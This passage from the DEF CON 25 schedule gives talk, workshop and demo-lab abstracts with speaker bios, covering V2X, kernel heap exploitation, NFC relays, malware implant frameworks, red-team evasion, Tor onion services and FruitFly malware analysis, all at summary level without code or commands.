p3n3troot0r (Duncan Woodbury) Hacker

ginsback (Nicholas Haltmeyer) Hacker

Vehicle-to-vehicle (V2V) and, more generally, vehicle-to-everything (V2X) wireless communications enable semi-autonomous driving via the exchange of state information between a network of connected vehicles and infrastructure units. Following 10+ years of standards development, particularly of IEEE 802.11p and the IEEE 1609 family, a lack of available implementations has prevented the involvement of the security community in development and testing of these standards. Analysis of the WAVE/DSRC protocols in their existing form reveals the presence of vulnerabilities which have the potential to render the protocol unfit for use in safety-critical systems. We present a complete Linux-stack based implementation of IEEE 802.11p and IEEE 1609.3/4 which provide a means for hackers and academics to participate in the engineering of secure standards for intelligent transportation systems.

p3n3troot0r (Duncan Woodbury)
Car hacker by trade, embedded systems security engineer by day. Entered the field of cyberauto security in 2012 through the Battelle CAVE red team and had the opportunity to improve the world by hacking transportation systems. Co-founded multiple security companies focused on building tools for automated exploitation of automotive systems (http://www.silent-cyber.com/), open-source frameworks for V2X, secure digital asset management, and 3D printing electric cars (https://hackaday.com/tag/lost-pla/) out of your garage (http://fosscar.faikvm.com/trac/). DEF CON lurker since the age of 17, recently having joined forces with friends and mentors to organize and host the DEF CON Car Hacking Village.

p3n3troot0r began working V2X with ginsback two years ago and realized the opportunity, in lieu of any open-source or full-stack V2X implementation, to bring the security community in to the driver's seat in the development of next-gen cyberauto standards. Together they have engaged the thought leaders in this space, and via the long-awaited integration of this stack into the mainline Linux kernel, the global development community is given the opportunity to participate in the development of automated and connected transportation systems.

ginsback (Nicholas Haltmeyer)
AI researcher and security professional. Began work in automotive security through the DEF CON Car Hacking Village and have since developed V2X software and routing schemes. Extensive experience in signal processing and RF hacking, including vital sign monitoring, activity recognition, and biometric identification through RF.

Given the (abyssal) state of automotive cybersecurity, ginsback aims to develop and field tools for V2X that open collaboration with the hacker community. As intelligent transit reaches critical mass, attacks on V2X infrastructure have the potential to cause incredible damage. ginsback partnered with p3n3troot0r to develop a free as in freedom V2X interface and extend an invitation for the community to discover and fix flaws in the design of what will soon be a massive network of connected vehicles.


Return to Index      -     

 

DEFCON - Track 1 - Friday - 10:00-10:30


macOS/iOS Kernel Debugging and Heap Feng Shui

Friday at 10:00 in 101 Track

20 minutes

Min(Spark) Zheng Security Expert @ Alibaba Inc. Ph.D of CUHK.

Xiangyu Liu Security Engineer @ Alibaba Inc. Ph.D of CUHK.

Kernel bug is always very difficult to reproduce and may lead to the entire system panic and restart. In practice, kernel debugging is the only way to analyze panic scenes. However, implementing such a technique in real world is not an easy task since kernel code cannot be executed in the debugger, thus is hard to be tracked. Luckily, macOS has provided a very powerful kernel debugging mechanism, KDK (Kernel Development Kit), to assist people to analyze and develop kernel exploits. While for iOS, although there is no official kernel debugger, it is also possible for us to achieve kernel debugging by leveraging some tricks.

In this talk, we will share some kernel debugging techniques and their corresponding tricks on the latest iOS/macOS. In addition, we will also introduce the new kernel heap mitigation mechanisms on iOS 10/macOS 10.12 and two heap feng shui techniques to bypass them. Finally, we will demonstrate how to debug a concrete kernel heap overflow bug and then leverage our new heap feng shui techniques to gain arbitrary kernel memory read/write on the iOS 10.2/macOS 10.12.

Min(Spark) Zheng
Min(Spark) Zheng, Security Expert @ Alibaba Inc. Ph.D of CUHK.

Xiangyu Liu
Xiangyu Liu, Security Engineer @ Alibaba Inc. Ph.D of CUHK.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 10:10-10:59


Make Your Own 802.11ac Monitoring Hacker Gadget

Vivek Ramachandran, Founder of Pentester Academy and SecurityTube.net
Thomas d'Otreppe, Author of Aircrack-ng

802.11ac networks present a significant challenge for scalable packet sniffing and analysis. With projected speeds in the Gigabit range, USB Wi-Fi card based solutions are now obsolete! In this workshop, we will look at how to build a custom monitoring solution for 802.11ac using off the shelf access points and open source software. Our "Hacker Gadget" will address 802.11ac monitoring challenges such as channel bonding, DFS channels, spatial streams and high throughput data rates. We will also look different techniques to do live streaming analysis of 802.11 packets and derive security insights from it!

Vivek Ramachandran (Twitter: @securitytube) is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking, conceptualized enterprise Wi-Fi Backdoors, created Chellam - the world's first Wi-Fi Firewall and Chigula - a Wi-Fi data mining and IDS framework. He is also the author of multiple five star rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which current aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon, Mundo Hacker Day and others.

Thomas d'Otreppe (Twitter: @aircrackng) is a wireless security researcher and author of Aircrack-ng, the most popular and complete suite of tools for WiFi network security assessments. He also created OpenWIPS-ng, an open source Wireless Intrusion Prevention System. Thomas is a contributor to the WiFi stack and toolset in Backtrack Linux, which has now become Kali Linux, the de facto top choice Linux distribution for penetration testing and vulnerability assessment across multiple technology domains. He is also known as an author of a pro-active wireless security course which has been delivered to large numbers of IT Security professionals worldwide. Thomas speaks and teaches in the Americas and Europe and is a well-known speaker at DefCon, BlackHat, DerbyCon, SharkFest, Mundo Hacker Day, BruCON and other venues


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 13:00-13:45


Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs

Sunday at 13:00 in Track 3

45 minutes | Art of Defense

Thomas Mathew OpenDNS (Cisco)

Dhia Mahjoub Head of Security Research, Cisco Umbrella (OpenDNS)

Prior research detailing the relationship between malware, bulletproof hosting, and SSL gave researchers methods to investigate SSL data only if given a set of seed domains. We present a novel statistical technique that allow us to discover botnet and bulletproof hosting IP space by examining SSL distribution patterns from open source data while working with limited or no seed information. This work can be accomplished using open source datasets and data tools.

SSL data obtained from scanning the entire IPv4 namespace can be represented as a series of 4 million node bipartite graphs where a common name is connected to either an IP/CIDR/ASN via an edge. We use the concept of relative entropy to create a pairwise distance metric between any two common names and any two ASNs. The metric allows us to generalize the concept of regular and anomalous SSL distribution patterns.

Relative entropy is useful in identifying domains that have anomalous network structures. The domains we found in this case were related to the Zbot proxy network. The Zbot proxy network contains a structure similar to popular CDNs like Akamai, Google, etc but instead rely on compromised devices to relay their data. Through layering these SSL signals with passive DNS data we create a pipeline that can extract Zbot domains with high accuracy.

Thomas Mathew
Thomas Mathew is a Security Researcher at OpenDNS (now part of Cisco) where he works on implementing pattern recognition algorithms to classify malware and botnets. His main interest lies in using various time series techniques on network sensor data to identify malicious threats. Previously, Thomas was a researcher at UC Santa Cruz, the US Naval Postgraduate School, and as a Product and Test Engineer at handsfree streaming video camera company Looxcie, Inc. He presented at ISOI APT, BruCon, FloCon and Kaspersky SAS.

Dhia Mahjoub
Dr. Dhia Mahjoub is the Head of Security Research at Cisco Umbrella (OpenDNS). He leads the core research team focused on large scale threat detection and threat intelligence and advises on R&D strategy. Dhia has a background in networks and security, has co-authored patents with OpenDNS and holds a PhD in graph algorithms applied on Wireless Sensor Networks problems. He regularly works with prospects and customers and speaks at conferences worldwide including Black Hat, Defcon, Virus Bulletin, BotConf, ShmooCon, FloCon, Kaspersky SAS, Infosecurity Europe, RSA, Usenix Enigma, ACSC, NCSC, and Les Assises de la sécurité.


Return to Index      -     

 

Demolabs - Table 5 - Saturday - 10:00-11:50


Maltego "Have I been pwned?"

Christian Heinrich

Saturday from 1000-1150 at Table Five

Audience: Defense

"Have I been pwned?" allows you to search across multiple data breaches to see if your email addresses or aliases has been compromised by LinkedIn, Tumblr, etc

Maltego is a link analysis application of technical infrastructure and/or social media networks from disparate sources of Open Source INTelligence (OSINT). Maltego is listed on the Top 10 Security Tools for Kali Linux by Network World and Top 125 Network Security Tools by the Nmap Project.

The integration of "Have I been pwned?" with Maltego visualises these breaches in an easy to understand graph format that can be enriched with other sources.

https://github.com/cmlh/Maltego-haveibeenpwned

Christian Heinrich
Christian Heinrich has presented at the OWASP Conferences in Australia, Europe and USA and OWASP Chapters in the Netherlands, London and Sydney and Melbourne, Australia, ToorCon (USA), Shmoocon (USA), BlackHat (Asia and USA), SecTor (Canada), CONFidence (Europe), Hack In The Box (Europe), SyScan (Singapore), B-Sides (Australia), RUXCON (Australia), and AusCERT (Australia).


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Thursday - 14:30-18:30


Malware Triage: Malscripts Are The New Exploit Kit

Thursday, 14:30 to 18:30 in Octavius 1

Sergei Frankoff Co-Founder, Open Analysis

Sean Wilson Co-Founder, Open Analysis

Malware triage is an important function in any mature incident response program; the process of quickly analyzing potentially malicious files or URLs to determine if your organization has exposure. Traditionally malware triage has focused on exploit kits which were the initial infection vector of choice, but this is changing. In recent years malscripts and file based exploits have become an equally common initial infection vector. Often delivered via email, malscripts can take many different forms, WScript, Javascript, or embedded macros. However, the goal is always the same; obtain code execution and deliver a malicious payload.

In this workshop you will work through the triage of a live malscript sample. During this process you will identify and extract malscripts from Office documents, manually deobfuscate the malscripts, circumvent anti-analysis techniques, and finally determine the purpose of the scripts and payload in order to develop countermeasures. The focus of this process will be the intersection between the techniques used to analyze malscripts and the larger incident response process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript, and Javascript, and you are familiar with windows internals you should have no problem completing the workshop. Please make sure to bring a laptop that you are able to analyze malware on (we recommend using a VM). We also recommend that you have Google Chrome installed, no other tools are required to be installed prior to the workshop.

Prerequisites: None

Materials: Students must bring a laptop that they are able to analyze malware on. We strongly recommend a VM with all anti-virus software disabled.

Max students: 35 | Registration: https://dc25_frankof.eventbrite.com (Sold out!)

Sergei Frankoff
Sergei is a co-founder of Open Analysis, and volunteers as a malware researcher. When he is not reverse engineering malware Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer in taking an open, community approach to combating cyber crime. He actively contributes to open source tools and tries to publish as much analysis as possible. With almost a decade of experience Sergei has held roles both, as the manager of an incident response team, and as a malware researcher.

Twitter: @herrcore
GitHub: https://github.com/herrcore and https://github.com/OALabs
Video Tutorials: https://vimeo.com/album/4455336

Sean Wilson
Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open source security tools focused on incident response and analysis. Sean brings over a decade of experience working in a number of incident response and application security roles with a focus on security testing and threat modelling. In his free time Sean loves fly fishing.

Twitter: @seanmw
GitHub: https://github.com/idiom and https://github.com/OALabs
Video Tutorials: https://vimeo.com/album/4561104


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 14:00-14:45


Man in the NFC

Sunday at 14:00 in Track 3

45 minutes | Demo, Tool

Haoqi Shan Wireless security researcher

Jian Yuan Wireless security researcher

NFC (Near Field Communication) technology is widely used in security, bank, payment and personal information exchange fields now, which is highly well-developed. Corresponding, the attacking methods against NFC are also emerged in endlessly. To solve this problem, we built a hardware tool which we called "UniProxy". This tool contains two self-modified high frequency card readers and two radio transmitters, which is a master-slave way. The master part can help people easily and successfully read almost all ISO 14443A type cards, (no matter what kind of this card is, bank card, ID card, Passport, access card, or whatever. No matter what security protocol this card uses, as long as it meets the ISO 14443A standard) meanwhile replaying this card to corresponding legal card reader via slave part to achieve our "evil" goals. The master and slave communicate with radio transmitters and can be apart between 50 - 200 meters.

Haoqi Shan
Haoqi Shan is currently a wireless/hardware security researcher in UnicornTeam of 360 Radio Security Research Dept. He focuses on Wi-Fi penetration, GSM system, embedded device hacking, building hacking tools, etc. He made serial presentations about Femto cell hacking, RFID hacking and LTE devices hacking on DEF CON , Cansecwest, Syscan360 and HITB, etc.

Jian Yuan
Yuan Jian is a security researcher in UnicornTeam of 360 Radio Security Research Dept. He is mainly focused on the security of Internet of things, NFC, GPS, etc. He was a speaker at the DEF CON Car Hacking Village.


Contributor Acknowledgement:

The Speakers would like to acknowledge Yuan Jian, for his contribution to the presentation. Yuan Jian is a security researcher in UnicornTeam of 360 Radio Security Research Dept. He is mainly focused on the security of Internet of things, NFC, GPS, etc. He was a speaker at the DEF CON Car Hacking Village.


Return to Index      -     

 

IOT - Main Contest Area - Saturday - 17:40-18:30


Manufactures Panel

No description available


Return to Index      -     

 

DEFCON - Track 3 - Friday - 17:00-17:45


MEATPISTOL, A Modular Malware Implant Framework

Friday at 17:00 in Track 3

45 minutes | Demo, Tool

FuzzyNop (Josh Schwartz) Director of Offensive Security @ Salesforce

ceyx (John Cramb) Hacker

Attention Red Teamers, Penetration Testers, and Offensive Security Operators, isn't the overhead of fighting attribution, spinning up infrastructure, and having to constantly re-write malware an absolute pain and timesink!?! It was for us too, so we're fixing that for good (well, maybe for evil). Join us for the public unveiling and open source release of our latest project, MEATPISTOL, a modular malware framework for implant creation, infrastructure automation, and shell interaction. This framework is designed to meet the needs of offensive security operators requiring rapid configuration and creation of long lived malware implants and associated command and control infrastructure. Say goodbye to writing janky one-off malware and say hello to building upon a framework designed to support efficient yoloscoped adversarial campaigns against capable targets.

FuzzyNop (Josh Schwartz) & ceyx (John Cramb)
FuzzyNop and ceyx were raised by computerized wolves with a penchant for fine art and rum based cocktails. While technically from different mothers and also sides of the world, they formed the first cyber wolf brothership shell-bent to ameliorate the state of targeted malware implants to support the ongoing war against the institutionalized mediocrity of the corporate shadow government. Working in tandem with dolphin researchers funded by the oligarch llamas they have found a way to synthesize powdered ethanol into mechanical pony fuel. Leading Offensive Security functions at Salesforce is merely a front to confuse the saurian overlords of their true purpose yet to be revealed...


Return to Index      -     

 

BHV - Pisa Room - Saturday - 11:30-11:59


Title: Microscopes are Stupid

Speaker: Louis Auguste

About Louis:
Lou Auguste is an entrepreneur in residence at the NYU Tandon incubator, Future Labs. He is passionate about microscopes, global health and creating jobs. His company Alexapath is at the forefront of AI based diagnostics and have collected awards from the ASME, Qualcomm, Singularity U, the Indian government, the British government and the US government.

Abstract:
Why can't microscopes diagnose disease? What if they could? For the past four years our team from NYU Tandon School of Engineering has been building an IoT system capable of turning a standard microscope into a digital imaging tool. And the goal is to connect every laboratory in the world into a global network.

We call our device the Auto Diagnostic Assistant, or ADA, in honor of Ada Lovelace, who likely died from undiagnosed cervical cancer. We think the biohacking village will enjoy learning about ADA because it is an extremely low cost microscope accessory capable of accomplishing the same tasks that were previously only able to be accomplished with whole slide imaging devices. Perfect for biohackers looking to save, share, study and analyse images of specimens from their microscope.

Our team is comprised of hardware engineers, software devs and machine learning computer scientists and our mission is to make diagnosis faster and easier. We have validated the accuracy of our mWSIs (mobile Whole Slide Images) with a pre-clinical study and presented our research as a poster at USCAP (United States and Canada Anatomical Pathology Conference). Additionally we published our original methods for creation of digital slides in the British Medical Journal (though the secret sauce has changed since then.)

The hardware prototype of ADA won an award for best hardware led social innovation from the ASME in 2015. Currently, we are launching our beta trial in India with the support of the US Department of State and the Indian Department of Science and Technology. We are actively looking for beta testers in the US as well and would be happy to provide one unit for free to a visitor or member of the biohacking village.



Return to Index      -     

 

DEFCON - Track 1 - Saturday - 11:00-11:30


Microservices and FaaS for Offensive Security

Saturday at 11:00 in 101 Track

20 minutes | Demo

Ryan Baxendale

There are more cloud service providers offering serverless or Function-as-a-service platforms for quickly deploying and scaling applications without the need for dedicated server instances and the overhead of system administration. This technical talk will cover the basic concepts of microservices and FaaS, and how to use them to scale time consuming offensive security testing tasks. Attacks that were previously considered impractical due to time and resource constraints can now be considered feasible with the availability of cloud services and the never-ending free flow of public IP addresses to avoid attribution and blacklists.

Key takeaways include a guide to scaling your tools and a demonstration on the practical benefits of utilising cloud services in performing undetected port scans, opportunistic attacks against short lived network services, brute-force attacks on services and OTP values, and creating your own whois database, shodan/censys, and searching for the elusive internet accessible IPv6 hosts.

Ryan Baxendale
Ryan Baxendale works as a penetration tester in Singapore where he leads a team of professional hackers. While his day is filled mainly with web and mobile penetration tests, he is more interested developing security tools, discovering IPv6 networks, and mining the internet for targeted low hanging fruit. He has previously spoken at XCon in Bejing on automating network pivoting and pillaging with an Armitage script, and has spoken at OWASP chapter and Null Security group meetings. https://www.linkedin.com/in/ryanbaxendale

@ryancancomputer
https://github.com/ryanbaxendale


Return to Index      -     

 

BHV - Pisa Room - Sunday - 11:30-11:59


Title: Might as well name it Parmigiana, American, Cheddar, and Swiss

Speaker: Ken Belva

About Ken Belva:
Kenneth F. Belva has had a distinguished career in cyber security for almost 20 years. His many roles have included managing a financial services cyber security program audited by the State and Fed, finding 0-days in major software, getting a US Patent on automated XSS exploitation techniques, as well as frequently speaking at many cyber security groups in NYC. He can be found on LinkedIn and on twitter at @infosecmaverick

Abstract:
PACS (picture archiving and communication system) is used in health care to store, retrieval, manage, distribute and present medical images. Such images are classified as PII as they are confidential patient data, usually x-rays along with a physician's patient notes. This talk will illustrate vulnerabilities in a PACS system. Note: potential surprises.



Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Friday - 10:30-14:30


Mobile App Attack 2.0

Friday, 10:30 to 14:30 in Octavius 6

Sneha Rajguru Security Consultant, Payatu Software Labs LLP

Mobiles Apps are the most preferred way of delivering the attacks today. Understanding the finer details of Mobile App attacks is soon becoming an essential skill for penetration testers as well as for the app developers & testers.

So, if you are an Android or an iOS User, a developer, a security analyst, a mobile pen-tester or just a mobile security enthusiast then the 'Mobile App Attack 2.0’ is of definite interest to you, as the Mobile App Attack 2.0 workshop familiarizes attendees with in-depth technical explanation of some of the most notorious mobile (Android and iOS) based vulnerabilities, ways to verify and exploit them. Along with the various Android, iOS application analysis techniques, inbuilt security schemes and teaches how to bypass those security models on both the platforms.

With live demos using intentionally crafted real-world vulnerable Android and iOS apps by the author, we shall look into the some of the common ways as to how the malicious apps bypass the security mechanisms or misuse the given permissions.

Apart from that we shall have a brief understanding of what is so special with the latest Android 7 and iOS 10 security and the relating flaws.

Prerequisites: The participants are expected to have a basic knowledge of Mobile Operating Systems. Knowledge of programming languages (Java and C, and Python for scripting) will be an added advantage to grasp things quickly.

Materials: Hardware Requirements
Minimum 4GB RAM and more than 20 GB Free Hard Disk Space
Android device ( >=2.3)
iPhone/iPad >= 7.1.2
(preferable Rooted/Jailbreak)

Software Requirements
Windows 7/8
*Nix
Mac OS X 10.5
Administrative privileges on your machines Virtualbox or VMPlayer
SSH Client
Xcode 6 or higher
ADB
Android Studio 1.3 or higher
Android SDK

Max students: 25 | Registration: https://dc25_rajguru.eventbrite.com (Sold out!)

Sneha Rajguru
Sneha works as a Senior Security Consultant with Payatu Technologies Pvt.Ltd. and holds C.E.H and E.C.S.A certifications. Her area of interest lies in Web application and mobile application security and fuzzing. She has discovered various serious application flaws within open source applications such as PDFLite.Jobberbase, Lucidchart and more. She is also an active member of Null – The open security community in India, and a contributor to regular meetups at the Pune chapter. She has spoken and provided training at GNUnify, FUDCon, Defcamp #6, DEF CON 24, BSidesLV and Nullcon 2017.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 15:00-15:45


MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt)

Saturday at 15:00 in 101 Track

45 minutes | Demo, Tool

Chris ThompsonRed Team Ops Lead, IBM X-Force Red

Windows Defender Advanced Threat Protection will soon be available for all Blue Teams to utilize within Windows 10 Enterprise, which includes detection of post breach tools, tactics and techniques commonly used by Red Teams, as well as behavior analytics. Combined with Microsoft Advanced Threat Analytics for user behavior analytics across the Domain, Red Teamers will soon face a significantly more challenging time maintaining stealth while performing internal recon, lateral movement, and privilege escalation in Windows 10/Active Directory environments.

This talk highlights challenges to red teams posed by Microsoft's new tools based on common hacking tools/techniques, and covers techniques which can be used to bypass, disable, or avoid high severity alerts within Windows Defender ATP and Microsoft ATA, as well as TTP used against mature organizations that may have additional controls in place such as Event Log Forwarding and Sysmon

Chris Thompson
Chris is Red Team Operations Lead at IBM X-Force Red. He has extensive experience performing penetration testing and red teaming for clients in a wide variety of industries. He's led red teaming operations against defense contractors and some of North America's largest banks.

He's on the board for CREST USA (crest-approved.org), working to help mature the pentesting industry. Chris also teaches Network & Mobile Pentesting at one of Canada's largest technical schools.

Hacking his way through life, Chris likes to pretend he's a good drone pilot, lock picker, and mountain biker.

Twitter: @retBandit


Return to Index      -     

 

BHV - Pisa Room - Friday - 11:30-11:59


Title: My dog is a hacker and will steal your data!

Speaker: Rafael Fontes Souza


About Rafael:
Rafael Fontes Souza aka b4ckd00r is a Senior Information Security Consultant at CIPHER. He is a core member of Cipher Intelligence Labs - the advanced security team focused on penetration testing, application security and computer forensics for premier clients. He started studying at age 13 and since then has disclosed security vulnerabilities and has received recognition and awards from major companies such as Apple, Microsoft, ESET, HP and others. Being done hundreds of successful penetration tests for various organizations, including government, banking, commercial sectors, as well the payment card industry.

Abstract:
This presentation is about a creative approach to intrusion tests, as the popular saying would say: "–The dog is man's best friend" (he makes you feel good and secure). Let's explore the vulnerability of layer eight, the human being, subject to error and the social engineering techniques; This is an innovative method, with art and style, will be simpler than it sounds; The dog will be used as an attack tool, which will carry a mobile phone hidden along with its pectoral collar.
The attack vectors are triggered automatically without any human interaction. This may include geographically close attacks, such as fake Wi-Fi access points, cellular base stations or local user attacks on a network, we can exploit DNS hijacking, packet injection, Evil-Twin, rogue router or ISP, and many other variants. Furthermore, the target will connect to your rogue wifi access point and the rules are enabled with the DHCP configurations to allow fake AP to allocate IP address to the clients and forward traffic to a fake/malicious web-site; Then, the information can be stored easily as well the injection of malicious file to remotely control the victim.
And it's done. You can drop your hacker dog in a park and expect him to hack people for you, quietly, that's perfect!



Return to Index      -     

 

Demolabs - Table 1 - Saturday - 14:00-15:50


Mycroft

Joshua Montgomery

Saturday from 1400-1550 at Table One

Audience: Hardware, IoT, Automotive, AI, Everyone

Mycroft is an open source virtual assistant similar to Siri or Amazon Alexa. The technology stack allows developers to include a voice interface in anything from a Raspberry Pi to a Jaguar FTYPE sports car.

Mycroft integrates Speech-To-Text, Natural Language Processing, a Skill Framework and a Speech To Text engine into a single, easy to deploy software stack.

Though the technology runs anywhere. The company has developed a Raspberry Pi image ( Pi-Croft ) and recently deployed a Gnome Shell Extension. The company also has a hardware device the "Mark I" that comes pre-loaded with the software and includes a variety of I/O options for directly controlling devices.

http://mycroft.ai/

Joshua Montgomery
Mycroft is a team effort, but the presenter is likely to be Joshua Montgomery. Joshua is a three time entrepreneur and Air Force officer. A graduate of the University of Kansas, Joshua founded Wicked Broadband - a gigabit fiber-to-the-home ISP in Lawrence, KS. As the owner of an ISP Joshua has been an advocate for shared networks, common carriage and net neutrality. He had been featured in Wired, Forbes and ArsTechnica and has been instrumental in advocating for municipal broadband in his home state of Kansas.

Joshua started the Mycroft project because he wanted to deploy the Star Trek computer in his makerspace. He recruited a talented team of developers, ran a highly successful Kickstarter, was invited to join Techstars in 2016 and is an alum of 500 Startups.

In his capacity as and Air Force Officer Joshua serves with the 177 IAS out of Wichita Kansas. His unit is responsible for providing threat replication for the Department of Defense.


Return to Index      -     

 

Night Life - Track 4 - Thursday - 18:30-20:30


Title:
n00b Party hosted by Duo Security.

Come to the DC101 Panel, Thursday, Track 1, 16:00 to 17:45 to find out more about this awesome event. All are welcome, but DEF CON "n00bs" are especially encouraged to attend. If you're new to attending DEF CON and are looking to make some connections then this is your party. Music, free swag giveaways, and more!
Return to Index      -     

 

BHV - Pisa Room - Sunday - 13:30-13:59


Title: Neuro Ethics

Speaker: Dr. Stanislav Naydin and Vlad Gostomelsky

About Dr. Dr. Stanislav Naydin:
Dr. Stanislav Naydin is in residency to for neurology with a background in pharmaceutical sciences. He is heavily focused on procedure based medicine. He has been involved in a multitude of advanced surgeries and interventions. Prior to transitioning to the medical field Stanislav was an industrial robotics designer and programmer in the glass industry.

About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks. He specializes in the intersection of physical and network security.

We will engage the audience in a discussion of modern technological advances along with their ethical implications. We live in an era where the very implanted hardware that keeps you alive can be evidence in the court of law. Neuroscience is now a tool used by marketing firms. Following this discussion on medical ethics we will continue with a show and tell of some recent cases where medical devices were used as evidence against the patients. We discuss some of the medical devices that have been tested by us in the past year and the vulnerabilities that were discovered.



Return to Index      -     

 

BHV - Pisa Room - Friday - 16:30-16:59


Title: Neurogenic Peptides: Smart Drugs 4-Minute Mile

Speakers: Gingerbread

About Gingerbread:
Long-time Security malcontent Gingerbread, having been eliminated early on in this years "Pop-and-Lock Potluck", (the nations *premier* overweight break dancing competition) has returned to DEF CON with even more of his half-baked theories, bro-science, and questionable supply chain advice for your enjoyment. Early adopter of the "Not for human consumption" defense, Gingerbread has spent years conducting extensive research in the areas of cognition enhancing drugs and lifestyle regimens and in the process has become a walking encyclopedia of things NOT to do.

Abstract:
Everything is impossible until it isn't.

Every undertaking, defined by the hard limitations at the edges of our possible achievement.

Lossless electrical conductivity, human travel beyond the sound 'barrier', running a four-minute mile...each, seen as some unassailable foe until, one-by-one, these milestones were not just approached and then attained, but very often surpassed. With time, these limits transition from the superlative, to the standard, and what once was thought of as impossible, now becomes the benchmark of superior performance.

The world of cognition enhancing drugs is no different.

For nearly as long as such structures have been differentiated, the cells of the brain and nervous system have been acknowledged to behave very differently than most of the others in the body.

Unlike the perpetual turn over that the rest of the body enjoys, there are only a few restricted areas in the brain and CNS of adult humans where new nerve cells are being regularly created. What you are born with, is what you have to work with.

Or is it?

Reliably producing productive structural, as opposed to solely chemical changes to the brain has long been seen as the 'Holy Grail' of Nootropics research..I am here today to discuss why the term "Four-minute mile" may be a bit more appropriate.

From the explosions of growth created in early childhood and in some illnesses, to the seemingly paradoxical benefits seen with the removal of malfunctioning structures, we are going to examine the sometimes baffling relationship between cognition and the physical structure of the brain, and how maybe, just maybe, there might be something you can do about it.



Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 11:00-11:59


Title:
Neutrality? We don't need no stinkin' Neutrality

1100 Friday
Munin
@munin
Neutrality? We don't need no stinkin' Neutrality

Net neutrality's pretty much a lost cause and traffic shaping according to network is pretty much inevitable at this point. Let's talk about ways to screw over the ISPs that perform these kinds of actions to pass our arbitrary traffic along their preferred channels in ways that they are unable to discern, taking advantage of their stupidity to give ourselves an advantage.

Return to Index      -     

 

DEFCON - Track 4 - Friday - 13:00-13:45


Next-Generation Tor Onion Services

Friday at 13:00 in Track 4

45 minutes | 0025

Roger Dingledine The Tor Project

Millions of people around the world use Tor every day to protect themselves from surveillance and censorship. While most people use Tor to reach ordinary websites more safely, a tiny fraction of Tor traffic makes up what overhyped journalists like to call the "dark web". Tor onion services (formerly known as Tor hidden services) let people run Internet services such as websites in a way where both the service and the people reaching it can get stronger security and privacy.

I wrote the original onion service code as a toy example in 2004, and it sure is showing its age. In particular, mistakes in the original protocol are now being actively exploited by fear-mongering "threat intelligence" companies to build lists of onion services even when the service operators thought they would stay under the radar.

These design flaws are a problem because people rely on onion services for many cool use cases, like metadata-free chat and file sharing, safe interaction between journalists and their sources, safe software updates, and more secure ways to reach popular websites like Facebook.

In this talk I'll present our new and improved onion service design, which provides stronger security and better scalability. I'll also publish a new release of the Tor software that lets people use the new design.

Roger Dingledine
Roger Dingledine is President and co-founder of the Tor Project, a non-profit that writes software to keep people around the world safe on the Internet.

Roger is a leading researcher in anonymous communications and a frequent public speaker. He coordinates and mentors academic researchers working on Tor-related topics, he is on the board of organizers for the international Privacy Enhancing Technologies Symposium (PETS), and he has authored or co-authored over two dozen peer-reviewed research papers on anonymous communications and privacy tools.

Among his achievements, Roger was chosen by the MIT Technology Review as one of its top 35 innovators under 35, he co-authored the Tor design paper that won a Usenix Security "Test of Time" award, and he has been recognized by Foreign Policy magazine as one of its top 100 global thinkers.

Roger graduated from The Massachusetts Institute of Technology and holds a Master's degree in electrical engineering and computer science as well as undergraduate degrees in computer science and mathematics.


Return to Index      -     

 

DEFCON - Track 1 - Friday - 10:20-10:40


Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server

Friday at 10:20 in 101 Track

20 minutes | Demo, Tool

Patrick Wardle Chief Security Researcher, Synack / Creator of Objective-See

Creating a custom command and control (C&C) server for someone else's malware has a myriad of benefits. If you can take over it a domain, you then may able to fully hijack other hackers' infected hosts. A more prosaic benefit is expediting analysis. While hackers and governments may be more interested in the former, malware analysts can benefit from the later

FruitFly, the first OS X/macOS malware of 2017, is a rather intriguing specimen. Selectively targeting biomedical research institutions, it is thought to have flown under the radar for many years. In this talk, we'll focus on the 'B' variant of FruitFly that even now, is only detected by a handful of security products.

We'll begin by analyzing the malware's dropper, an obfuscated perl script. As this language is rather archaic and uncommon in malware droppers, we'll discuss some debugging techniques and fully deconstruct the script.

While this dropper component also communicates with the C&C server and supports some basic commands, it drops a binary payload in order to perform more complex actions. However, instead of fully reversing this piece of the malware, the talk will focus on an initial triage and show how this was sufficient for the creation of a custom C&C server. With such a server, we can easily coerce the malware to reveal it's full capabilities. For example, the malware invokes a handful of low-level mouse & graphics APIs, passing in a variety of dynamic parameters. Instead of spending hours reversing and debugging this complex code, via the C&C server, we can simply send it various commands and observe the effects.

Of course this approach hinges on the ability to closely observe the malware's actions. As such, we'll discuss macOS-specific tools that can monitor various events, and where necessary detail the creation of custom ones (e.g. a 'mouse sniffer' that locally observes and decodes commands sent from the malware to the OS, in order to control the mouse).

While some of this talk is FruitFly and/or macOS specific, conceptually it should broadly apply to analyzing other malware, even on other operating systems :)

Patrick Wardle
